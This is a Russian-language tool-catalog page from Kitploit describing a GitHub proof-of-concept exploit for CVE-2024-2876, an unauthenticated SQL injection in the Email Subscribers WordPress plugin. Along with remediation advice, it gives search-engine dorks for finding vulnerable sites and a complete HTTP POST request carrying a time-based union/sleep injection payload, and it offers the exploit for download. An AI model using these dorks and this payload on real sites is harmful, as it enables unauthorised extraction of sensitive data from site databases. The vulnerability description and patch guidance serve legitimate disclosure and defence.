Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-2876 — Эксплойт доказательства концепции для CVE-2024-2876, неаутентифицированная уязвимость SQL-инъекции в плагине Email Subscribers для WordPress, позволяющая извлекать конфиденциальные данные. | Kitploit
Инструменты/GitHubGitHub/chsxthwik/cve-2024-2876
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubchsxthwik/cve-2024-2876

CVE-2024-2876

Эксплойт доказательства концепции для CVE-2024-2876, неаутентифицированная уязвимость SQL-инъекции в плагине Email Subscribers для WordPress, позволяющая извлекать конфиденциальные данные.

Репозиторий
22341 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-2876

#Описание уязвимости: Плагин Email Subscribers от Icegram Express – Email Marketing, Newsletters, Automation для WordPress & WooCommerce для WordPress уязвим к SQL-инъекции через функцию run класса IG_ES_Subscribers_Query во всех версиях до 5.7.14 включительно из-за недостаточного экранирования переданного пользователем параметра и отсутствия достаточной подготовки существующего SQL-запроса. Это позволяет неаутентифицированным злоумышленникам добавлять дополнительные SQL-запросы в уже существующие, которые могут быть использованы для извлечения конфиденциальной информации из базы данных.

#Дорк: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"

#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE

#Как исправить? Поскольку все версии до 5.7.14 были обнаружены с этим CVE, пользователям рекомендуется обновить плагин Email Subscribers от Icegram Express до версии 5.7.15 (или последнего релиза 5.7.19). Пользователи Patchstack имеют возможность включить автоматическое обновление специально для уязвимых плагинов. Внедрите решение WAF/WAAP в качестве дополнительного уровня защиты. Преимущество таких решений в том, что даже если уязвимость новая и неизвестная (0-day), они всё равно могут предотвратить атаки, обнаруживая шаблоны и методы эксплуатации.

#Ресурс: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

Скачать инструмент